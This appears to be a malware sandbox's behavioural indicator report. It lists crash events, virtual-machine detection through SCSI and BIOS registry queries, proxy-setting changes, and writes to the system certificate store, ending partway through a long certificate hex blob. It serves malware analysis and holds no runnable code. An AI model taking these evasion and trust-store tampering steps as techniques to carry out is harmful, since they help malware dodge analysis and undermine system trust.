N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b97ed4d9-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-540404634-651139247-2967210625-1000\{A98C9AA3-1854-4E23-AFF0-761D08CAA7FB} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7